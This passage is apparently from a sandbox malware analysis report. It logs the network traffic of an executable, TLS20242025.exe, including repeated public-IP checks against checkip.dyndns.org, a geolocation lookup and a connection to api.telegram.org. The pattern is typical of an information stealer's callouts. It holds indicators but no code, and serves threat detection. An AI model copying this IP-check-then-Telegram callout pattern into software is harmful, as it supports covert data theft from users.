                                                Sep 26, 2024 15:19:06.989016056 CEST44349713188.114.97.3192.168.2.6
                                                Sep 26, 2024 15:19:07.463079929 CEST44349713188.114.97.3192.168.2.6
                                                Sep 26, 2024 15:19:07.463167906 CEST49713443192.168.2.6188.114.97.3
                                                Sep 26, 2024 15:19:07.469176054 CEST49713443192.168.2.6188.114.97.3
                                                Sep 26, 2024 15:19:07.469208002 CEST44349713188.114.97.3192.168.2.6
                                                Sep 26, 2024 15:19:07.469682932 CEST44349713188.114.97.3192.168.2.6
                                                Sep 26, 2024 15:19:07.514933109 CEST49713443192.168.2.6188.114.97.3
                                                Sep 26, 2024 15:19:07.536870956 CEST49713443192.168.2.6188.114.97.3
                                                Sep 26, 2024 15:19:07.579425097 CEST44349713188.114.97.3192.168.2.6
                                                Sep 26, 2024 15:19:07.645138025 CEST44349713188.114.97.3192.168.2.6
                                                Sep 26, 2024 15:19:07.645370007 CEST44349713188.114.97.3192.168.2.6
                                                Sep 26, 2024 15:19:07.645442009 CEST49713443192.168.2.6188.114.97.3
                                                Sep 26, 2024 15:19:07.652160883 CEST49713443192.168.2.6188.114.97.3
                                                Sep 26, 2024 15:19:07.657269001 CEST4971080192.168.2.6193.122.130.0
                                                Sep 26, 2024 15:19:07.662177086 CEST8049710193.122.130.0192.168.2.6
                                                Sep 26, 2024 15:19:07.760487080 CEST8049710193.122.130.0192.168.2.6
                                                Sep 26, 2024 15:19:07.765055895 CEST49715443192.168.2.6188.114.97.3
                                                Sep 26, 2024 15:19:07.765156984 CEST44349715188.114.97.3192.168.2.6
                                                Sep 26, 2024 15:19:07.765252113 CEST49715443192.168.2.6188.114.97.3
                                                Sep 26, 2024 15:19:07.765949965 CEST49715443192.168.2.6188.114.97.3
                                                Sep 26, 2024 15:19:07.765985966 CEST44349715188.114.97.3192.168.2.6
                                                Sep 26, 2024 15:19:07.811791897 CEST4971080192.168.2.6193.122.130.0
                                                Sep 26, 2024 15:19:08.236881018 CEST44349715188.114.97.3192.168.2.6
                                                Sep 26, 2024 15:19:08.240463018 CEST49715443192.168.2.6188.114.97.3
                                                Sep 26, 2024 15:19:08.240495920 CEST44349715188.114.97.3192.168.2.6
                                                Sep 26, 2024 15:19:08.396745920 CEST44349715188.114.97.3192.168.2.6
                                                Sep 26, 2024 15:19:08.397018909 CEST44349715188.114.97.3192.168.2.6
                                                Sep 26, 2024 15:19:08.397098064 CEST49715443192.168.2.6188.114.97.3
                                                Sep 26, 2024 15:19:08.397790909 CEST49715443192.168.2.6188.114.97.3
                                                Sep 26, 2024 15:19:08.401820898 CEST4971080192.168.2.6193.122.130.0
                                                Sep 26, 2024 15:19:08.403162003 CEST4971780192.168.2.6193.122.130.0
                                                Sep 26, 2024 15:19:08.406990051 CEST8049710193.122.130.0192.168.2.6
                                                Sep 26, 2024 15:19:08.407057047 CEST4971080192.168.2.6193.122.130.0
                                                Sep 26, 2024 15:19:08.408124924 CEST8049717193.122.130.0192.168.2.6
                                                Sep 26, 2024 15:19:08.408219099 CEST4971780192.168.2.6193.122.130.0
                                                Sep 26, 2024 15:19:08.408338070 CEST4971780192.168.2.6193.122.130.0
                                                Sep 26, 2024 15:19:08.413367033 CEST8049717193.122.130.0192.168.2.6
                                                Sep 26, 2024 15:19:08.864907026 CEST8049717193.122.130.0192.168.2.6
                                                Sep 26, 2024 15:19:08.869179964 CEST49718443192.168.2.6188.114.97.3
                                                Sep 26, 2024 15:19:08.869240046 CEST44349718188.114.97.3192.168.2.6
                                                Sep 26, 2024 15:19:08.869343996 CEST49718443192.168.2.6188.114.97.3
                                                Sep 26, 2024 15:19:08.869656086 CEST49718443192.168.2.6188.114.97.3
                                                Sep 26, 2024 15:19:08.869674921 CEST44349718188.114.97.3192.168.2.6
                                                Sep 26, 2024 15:19:08.921190977 CEST4971780192.168.2.6193.122.130.0
                                                Sep 26, 2024 15:19:09.407254934 CEST44349718188.114.97.3192.168.2.6
                                                Sep 26, 2024 15:19:09.409394979 CEST49718443192.168.2.6188.114.97.3
                                                Sep 26, 2024 15:19:09.409424067 CEST44349718188.114.97.3192.168.2.6
                                                Sep 26, 2024 15:19:09.541712046 CEST44349718188.114.97.3192.168.2.6
                                                Sep 26, 2024 15:19:09.541897058 CEST44349718188.114.97.3192.168.2.6
                                                Sep 26, 2024 15:19:09.542001009 CEST49718443192.168.2.6188.114.97.3
                                                Sep 26, 2024 15:19:09.542663097 CEST49718443192.168.2.6188.114.97.3
                                                Sep 26, 2024 15:19:09.547871113 CEST4971980192.168.2.6193.122.130.0
                                                Sep 26, 2024 15:19:09.553009987 CEST8049719193.122.130.0192.168.2.6
                                                Sep 26, 2024 15:19:09.553170919 CEST4971980192.168.2.6193.122.130.0
                                                Sep 26, 2024 15:19:09.553265095 CEST4971980192.168.2.6193.122.130.0
                                                Sep 26, 2024 15:19:09.558110952 CEST8049719193.122.130.0192.168.2.6
                                                Sep 26, 2024 15:19:10.027354956 CEST8049719193.122.130.0192.168.2.6
                                                Sep 26, 2024 15:19:10.028781891 CEST49720443192.168.2.6188.114.97.3
                                                Sep 26, 2024 15:19:10.028844118 CEST44349720188.114.97.3192.168.2.6
                                                Sep 26, 2024 15:19:10.028920889 CEST49720443192.168.2.6188.114.97.3
                                                Sep 26, 2024 15:19:10.029198885 CEST49720443192.168.2.6188.114.97.3
                                                Sep 26, 2024 15:19:10.029211998 CEST44349720188.114.97.3192.168.2.6
                                                Sep 26, 2024 15:19:10.077553988 CEST4971980192.168.2.6193.122.130.0
                                                Sep 26, 2024 15:19:10.494878054 CEST44349720188.114.97.3192.168.2.6
                                                Sep 26, 2024 15:19:10.496982098 CEST49720443192.168.2.6188.114.97.3
                                                Sep 26, 2024 15:19:10.497006893 CEST44349720188.114.97.3192.168.2.6
                                                Sep 26, 2024 15:19:10.641309977 CEST44349720188.114.97.3192.168.2.6
                                                Sep 26, 2024 15:19:10.641587973 CEST44349720188.114.97.3192.168.2.6
                                                Sep 26, 2024 15:19:10.641648054 CEST49720443192.168.2.6188.114.97.3
                                                Sep 26, 2024 15:19:10.642102957 CEST49720443192.168.2.6188.114.97.3
                                                Sep 26, 2024 15:19:10.646418095 CEST4971980192.168.2.6193.122.130.0
                                                Sep 26, 2024 15:19:10.647695065 CEST4972280192.168.2.6193.122.130.0
                                                Sep 26, 2024 15:19:10.651679993 CEST8049719193.122.130.0192.168.2.6
                                                Sep 26, 2024 15:19:10.651748896 CEST4971980192.168.2.6193.122.130.0
                                                Sep 26, 2024 15:19:10.652641058 CEST8049722193.122.130.0192.168.2.6
                                                Sep 26, 2024 15:19:10.652725935 CEST4972280192.168.2.6193.122.130.0
                                                Sep 26, 2024 15:19:10.652905941 CEST4972280192.168.2.6193.122.130.0
                                                Sep 26, 2024 15:19:10.657819033 CEST8049722193.122.130.0192.168.2.6
                                                Sep 26, 2024 15:19:11.118120909 CEST8049722193.122.130.0192.168.2.6
                                                Sep 26, 2024 15:19:11.119896889 CEST49724443192.168.2.6188.114.97.3
                                                Sep 26, 2024 15:19:11.119949102 CEST44349724188.114.97.3192.168.2.6
                                                Sep 26, 2024 15:19:11.120049953 CEST49724443192.168.2.6188.114.97.3
                                                Sep 26, 2024 15:19:11.120572090 CEST49724443192.168.2.6188.114.97.3
                                                Sep 26, 2024 15:19:11.120590925 CEST44349724188.114.97.3192.168.2.6
                                                Sep 26, 2024 15:19:11.171160936 CEST4972280192.168.2.6193.122.130.0
                                                Sep 26, 2024 15:19:11.604012966 CEST44349724188.114.97.3192.168.2.6
                                                Sep 26, 2024 15:19:11.606028080 CEST49724443192.168.2.6188.114.97.3
                                                Sep 26, 2024 15:19:11.606051922 CEST44349724188.114.97.3192.168.2.6
                                                Sep 26, 2024 15:19:11.733767986 CEST44349724188.114.97.3192.168.2.6
                                                Sep 26, 2024 15:19:11.734016895 CEST44349724188.114.97.3192.168.2.6
                                                Sep 26, 2024 15:19:11.734329939 CEST49724443192.168.2.6188.114.97.3
                                                Sep 26, 2024 15:19:11.734618902 CEST49724443192.168.2.6188.114.97.3
                                                Sep 26, 2024 15:19:11.739625931 CEST4972580192.168.2.6193.122.130.0
                                                Sep 26, 2024 15:19:11.739641905 CEST4972280192.168.2.6193.122.130.0
                                                Sep 26, 2024 15:19:11.744489908 CEST8049725193.122.130.0192.168.2.6
                                                Sep 26, 2024 15:19:11.744621038 CEST4972580192.168.2.6193.122.130.0
                                                Sep 26, 2024 15:19:11.744726896 CEST4972580192.168.2.6193.122.130.0
                                                Sep 26, 2024 15:19:11.745012045 CEST8049722193.122.130.0192.168.2.6
                                                Sep 26, 2024 15:19:11.745229006 CEST4972280192.168.2.6193.122.130.0
                                                Sep 26, 2024 15:19:11.750215054 CEST8049725193.122.130.0192.168.2.6
                                                Sep 26, 2024 15:19:12.204050064 CEST8049725193.122.130.0192.168.2.6
                                                Sep 26, 2024 15:19:12.205915928 CEST49726443192.168.2.6188.114.97.3
                                                Sep 26, 2024 15:19:12.205972910 CEST44349726188.114.97.3192.168.2.6
                                                Sep 26, 2024 15:19:12.206067085 CEST49726443192.168.2.6188.114.97.3
                                                Sep 26, 2024 15:19:12.206670046 CEST49726443192.168.2.6188.114.97.3
                                                Sep 26, 2024 15:19:12.206687927 CEST44349726188.114.97.3192.168.2.6
                                                Sep 26, 2024 15:19:12.249310017 CEST4972580192.168.2.6193.122.130.0
                                                Sep 26, 2024 15:19:12.674756050 CEST44349726188.114.97.3192.168.2.6
                                                Sep 26, 2024 15:19:12.676975965 CEST49726443192.168.2.6188.114.97.3
                                                Sep 26, 2024 15:19:12.677010059 CEST44349726188.114.97.3192.168.2.6
                                                Sep 26, 2024 15:19:12.825274944 CEST44349726188.114.97.3192.168.2.6
                                                Sep 26, 2024 15:19:12.825396061 CEST44349726188.114.97.3192.168.2.6
                                                Sep 26, 2024 15:19:12.825445890 CEST49726443192.168.2.6188.114.97.3
                                                Sep 26, 2024 15:19:12.826114893 CEST49726443192.168.2.6188.114.97.3
                                                Sep 26, 2024 15:19:12.830832958 CEST4972580192.168.2.6193.122.130.0
                                                Sep 26, 2024 15:19:12.832290888 CEST4972780192.168.2.6193.122.130.0
                                                Sep 26, 2024 15:19:12.836149931 CEST8049725193.122.130.0192.168.2.6
                                                Sep 26, 2024 15:19:12.836210012 CEST4972580192.168.2.6193.122.130.0
                                                Sep 26, 2024 15:19:12.837189913 CEST8049727193.122.130.0192.168.2.6
                                                Sep 26, 2024 15:19:12.837258101 CEST4972780192.168.2.6193.122.130.0
                                                Sep 26, 2024 15:19:12.837373972 CEST4972780192.168.2.6193.122.130.0
                                                Sep 26, 2024 15:19:12.842282057 CEST8049727193.122.130.0192.168.2.6
                                                Sep 26, 2024 15:19:13.314461946 CEST8049727193.122.130.0192.168.2.6
                                                Sep 26, 2024 15:19:13.315871000 CEST49728443192.168.2.6188.114.97.3
                                                Sep 26, 2024 15:19:13.315913916 CEST44349728188.114.97.3192.168.2.6
                                                Sep 26, 2024 15:19:13.315984011 CEST49728443192.168.2.6188.114.97.3
                                                Sep 26, 2024 15:19:13.316318989 CEST49728443192.168.2.6188.114.97.3
                                                Sep 26, 2024 15:19:13.316329956 CEST44349728188.114.97.3192.168.2.6
                                                Sep 26, 2024 15:19:13.358661890 CEST4972780192.168.2.6193.122.130.0
                                                Sep 26, 2024 15:19:13.777332067 CEST44349728188.114.97.3192.168.2.6
                                                Sep 26, 2024 15:19:13.786772966 CEST49728443192.168.2.6188.114.97.3
                                                Sep 26, 2024 15:19:13.786806107 CEST44349728188.114.97.3192.168.2.6
                                                Sep 26, 2024 15:19:13.928745031 CEST44349728188.114.97.3192.168.2.6
                                                Sep 26, 2024 15:19:13.929035902 CEST44349728188.114.97.3192.168.2.6
                                                Sep 26, 2024 15:19:13.929105043 CEST49728443192.168.2.6188.114.97.3
                                                Sep 26, 2024 15:19:13.929550886 CEST49728443192.168.2.6188.114.97.3
                                                Sep 26, 2024 15:19:13.934082985 CEST4972780192.168.2.6193.122.130.0
                                                Sep 26, 2024 15:19:13.935256004 CEST4972980192.168.2.6193.122.130.0
                                                Sep 26, 2024 15:19:13.939229965 CEST8049727193.122.130.0192.168.2.6
                                                Sep 26, 2024 15:19:13.939285994 CEST4972780192.168.2.6193.122.130.0
                                                Sep 26, 2024 15:19:13.940248013 CEST8049729193.122.130.0192.168.2.6
                                                Sep 26, 2024 15:19:13.940326929 CEST4972980192.168.2.6193.122.130.0
                                                Sep 26, 2024 15:19:13.940435886 CEST4972980192.168.2.6193.122.130.0
                                                Sep 26, 2024 15:19:13.945573092 CEST8049729193.122.130.0192.168.2.6
                                                Sep 26, 2024 15:19:14.406107903 CEST8049729193.122.130.0192.168.2.6
                                                Sep 26, 2024 15:19:14.408034086 CEST49730443192.168.2.6188.114.97.3
                                                Sep 26, 2024 15:19:14.408143997 CEST44349730188.114.97.3192.168.2.6
                                                Sep 26, 2024 15:19:14.408237934 CEST49730443192.168.2.6188.114.97.3
                                                Sep 26, 2024 15:19:14.408560991 CEST49730443192.168.2.6188.114.97.3
                                                Sep 26, 2024 15:19:14.408628941 CEST44349730188.114.97.3192.168.2.6
                                                Sep 26, 2024 15:19:14.452447891 CEST4972980192.168.2.6193.122.130.0
                                                Sep 26, 2024 15:19:14.885658979 CEST44349730188.114.97.3192.168.2.6
                                                Sep 26, 2024 15:19:14.887407064 CEST49730443192.168.2.6188.114.97.3
                                                Sep 26, 2024 15:19:14.887450933 CEST44349730188.114.97.3192.168.2.6
                                                Sep 26, 2024 15:19:15.015572071 CEST44349730188.114.97.3192.168.2.6
                                                Sep 26, 2024 15:19:15.015695095 CEST44349730188.114.97.3192.168.2.6
                                                Sep 26, 2024 15:19:15.015813112 CEST49730443192.168.2.6188.114.97.3
                                                Sep 26, 2024 15:19:15.016679049 CEST49730443192.168.2.6188.114.97.3
                                                Sep 26, 2024 15:19:15.029475927 CEST4972980192.168.2.6193.122.130.0
                                                Sep 26, 2024 15:19:15.030842066 CEST4973180192.168.2.6193.122.130.0
                                                Sep 26, 2024 15:19:15.034676075 CEST8049729193.122.130.0192.168.2.6
                                                Sep 26, 2024 15:19:15.034781933 CEST4972980192.168.2.6193.122.130.0
                                                Sep 26, 2024 15:19:15.035733938 CEST8049731193.122.130.0192.168.2.6
                                                Sep 26, 2024 15:19:15.035811901 CEST4973180192.168.2.6193.122.130.0
                                                Sep 26, 2024 15:19:15.035927057 CEST4973180192.168.2.6193.122.130.0
                                                Sep 26, 2024 15:19:15.040680885 CEST8049731193.122.130.0192.168.2.6
                                                Sep 26, 2024 15:19:15.511804104 CEST8049731193.122.130.0192.168.2.6
                                                Sep 26, 2024 15:19:15.513346910 CEST49733443192.168.2.6188.114.97.3
                                                Sep 26, 2024 15:19:15.513447046 CEST44349733188.114.97.3192.168.2.6
                                                Sep 26, 2024 15:19:15.513639927 CEST49733443192.168.2.6188.114.97.3
                                                Sep 26, 2024 15:19:15.513859034 CEST49733443192.168.2.6188.114.97.3
                                                Sep 26, 2024 15:19:15.513895988 CEST44349733188.114.97.3192.168.2.6
                                                Sep 26, 2024 15:19:15.561886072 CEST4973180192.168.2.6193.122.130.0
                                                Sep 26, 2024 15:19:15.971615076 CEST44349733188.114.97.3192.168.2.6
                                                Sep 26, 2024 15:19:15.973306894 CEST49733443192.168.2.6188.114.97.3
                                                Sep 26, 2024 15:19:15.973325014 CEST44349733188.114.97.3192.168.2.6
                                                Sep 26, 2024 15:19:16.118076086 CEST44349733188.114.97.3192.168.2.6
                                                Sep 26, 2024 15:19:16.118215084 CEST44349733188.114.97.3192.168.2.6
                                                Sep 26, 2024 15:19:16.118283033 CEST49733443192.168.2.6188.114.97.3
                                                Sep 26, 2024 15:19:16.156883001 CEST49733443192.168.2.6188.114.97.3
                                                Sep 26, 2024 15:19:16.180550098 CEST4973180192.168.2.6193.122.130.0
                                                Sep 26, 2024 15:19:16.185941935 CEST8049731193.122.130.0192.168.2.6
                                                Sep 26, 2024 15:19:16.186042070 CEST4973180192.168.2.6193.122.130.0
                                                Sep 26, 2024 15:19:16.200383902 CEST49734443192.168.2.6149.154.167.220
                                                Sep 26, 2024 15:19:16.200433969 CEST44349734149.154.167.220192.168.2.6
                                                Sep 26, 2024 15:19:16.200522900 CEST49734443192.168.2.6149.154.167.220
                                                Sep 26, 2024 15:19:16.205782890 CEST49734443192.168.2.6149.154.167.220
                                                Sep 26, 2024 15:19:16.205801010 CEST44349734149.154.167.220192.168.2.6
                                                Sep 26, 2024 15:19:16.828135967 CEST44349734149.154.167.220192.168.2.6
                                                Sep 26, 2024 15:19:16.828481913 CEST49734443192.168.2.6149.154.167.220
                                                Sep 26, 2024 15:19:16.830562115 CEST49734443192.168.2.6149.154.167.220
                                                Sep 26, 2024 15:19:16.830573082 CEST44349734149.154.167.220192.168.2.6
                                                Sep 26, 2024 15:19:16.830918074 CEST44349734149.154.167.220192.168.2.6
                                                Sep 26, 2024 15:19:16.832509995 CEST49734443192.168.2.6149.154.167.220
                                                Sep 26, 2024 15:19:16.879400969 CEST44349734149.154.167.220192.168.2.6
                                                Sep 26, 2024 15:19:17.218261003 CEST44349734149.154.167.220192.168.2.6
                                                Sep 26, 2024 15:19:17.218348026 CEST44349734149.154.167.220192.168.2.6
                                                Sep 26, 2024 15:19:17.218393087 CEST49734443192.168.2.6149.154.167.220
                                                Sep 26, 2024 15:19:17.223449945 CEST49734443192.168.2.6149.154.167.220
                                                Sep 26, 2024 15:19:22.427514076 CEST4971780192.168.2.6193.122.130.0
                                                TimestampSource PortDest PortSource IPDest IP
                                                Sep 26, 2024 15:19:05.630352974 CEST5683653192.168.2.61.1.1.1
                                                Sep 26, 2024 15:19:05.638216972 CEST53568361.1.1.1192.168.2.6
                                                Sep 26, 2024 15:19:06.967119932 CEST4930353192.168.2.61.1.1.1
                                                Sep 26, 2024 15:19:06.974488974 CEST53493031.1.1.1192.168.2.6
                                                Sep 26, 2024 15:19:16.180421114 CEST5358553192.168.2.61.1.1.1
                                                Sep 26, 2024 15:19:16.187434912 CEST53535851.1.1.1192.168.2.6
                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Sep 26, 2024 15:19:05.630352974 CEST192.168.2.61.1.1.10x7b8bStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                Sep 26, 2024 15:19:06.967119932 CEST192.168.2.61.1.1.10x1759Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                Sep 26, 2024 15:19:16.180421114 CEST192.168.2.61.1.1.10xfb17Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Sep 26, 2024 15:19:05.638216972 CEST1.1.1.1192.168.2.60x7b8bNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                Sep 26, 2024 15:19:05.638216972 CEST1.1.1.1192.168.2.60x7b8bNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                Sep 26, 2024 15:19:05.638216972 CEST1.1.1.1192.168.2.60x7b8bNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                Sep 26, 2024 15:19:05.638216972 CEST1.1.1.1192.168.2.60x7b8bNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                Sep 26, 2024 15:19:05.638216972 CEST1.1.1.1192.168.2.60x7b8bNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                Sep 26, 2024 15:19:05.638216972 CEST1.1.1.1192.168.2.60x7b8bNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                Sep 26, 2024 15:19:06.974488974 CEST1.1.1.1192.168.2.60x1759No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                Sep 26, 2024 15:19:06.974488974 CEST1.1.1.1192.168.2.60x1759No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                Sep 26, 2024 15:19:16.187434912 CEST1.1.1.1192.168.2.60xfb17No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                • reallyfreegeoip.org
                                                • api.telegram.org
                                                • checkip.dyndns.org
                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.649710193.122.130.0805576C:\Users\user\Desktop\TLS20242025.exe
                                                TimestampBytes transferredDirectionData
                                                Sep 26, 2024 15:19:05.659281969 CEST151OUTGET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Connection: Keep-Alive
                                                Sep 26, 2024 15:19:06.122944117 CEST320INHTTP/1.1 200 OK
                                                Date: Thu, 26 Sep 2024 13:19:06 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 0bcddeea9a7805c8e381fa665af7b383
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                Sep 26, 2024 15:19:06.166923046 CEST127OUTGET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Sep 26, 2024 15:19:06.640362978 CEST320INHTTP/1.1 200 OK
                                                Date: Thu, 26 Sep 2024 13:19:06 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: c23ce5d2c2a85db8a946edb5bd7a349d
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                Sep 26, 2024 15:19:07.657269001 CEST127OUTGET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Sep 26, 2024 15:19:07.760487080 CEST320INHTTP/1.1 200 OK
                                                Date: Thu, 26 Sep 2024 13:19:07 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 2431fd51b921f24b6bb741ebe571ddf4
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                1192.168.2.649717193.122.130.0805576C:\Users\user\Desktop\TLS20242025.exe
                                                TimestampBytes transferredDirectionData
                                                Sep 26, 2024 15:19:08.408338070 CEST127OUTGET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Sep 26, 2024 15:19:08.864907026 CEST320INHTTP/1.1 200 OK
                                                Date: Thu, 26 Sep 2024 13:19:08 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: c0b2429725f949ca32ac748a40974f93
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                2192.168.2.649719193.122.130.0805576C:\Users\user\Desktop\TLS20242025.exe
                                                TimestampBytes transferredDirectionData
                                                Sep 26, 2024 15:19:09.553265095 CEST151OUTGET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Connection: Keep-Alive
                                                Sep 26, 2024 15:19:10.027354956 CEST320INHTTP/1.1 200 OK
                                                Date: Thu, 26 Sep 2024 13:19:09 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 38ca7c2f7ebc57cb110af190f9cafb75
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                3192.168.2.649722193.122.130.0805576C:\Users\user\Desktop\TLS20242025.exe
                                                TimestampBytes transferredDirectionData
                                                Sep 26, 2024 15:19:10.652905941 CEST151OUTGET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Connection: Keep-Alive
                                                Sep 26, 2024 15:19:11.118120909 CEST320INHTTP/1.1 200 OK
                                                Date: Thu, 26 Sep 2024 13:19:11 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 550ad1ce73b9101620f1098956164895
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                4192.168.2.649725193.122.130.0805576C:\Users\user\Desktop\TLS20242025.exe
                                                TimestampBytes transferredDirectionData
                                                Sep 26, 2024 15:19:11.744726896 CEST151OUTGET / HTTP/1.1
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                Host: checkip.dyndns.org
                                                Connection: Keep-Alive
                                                Sep 26, 2024 15:19:12.204050064 CEST320INHTTP/1.1 200 OK
                                                Date: Thu, 26 Sep 2024 13:19:12 GMT
                                                Content-Type: text/html
                                                Content-Length: 103
                                                Connection: keep-alive
                                                Cache-Control: no-cache
                                                Pragma: no-cache
                                                X-Request-ID: 8e9eb4992c8cf77aca17a7ca7bd412c8
                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                5192.168.2.649727193.122.130.0805576C:\Users\user\Desktop\TLS20242025.exe
                                                TimestampBytes transferredDirectionData
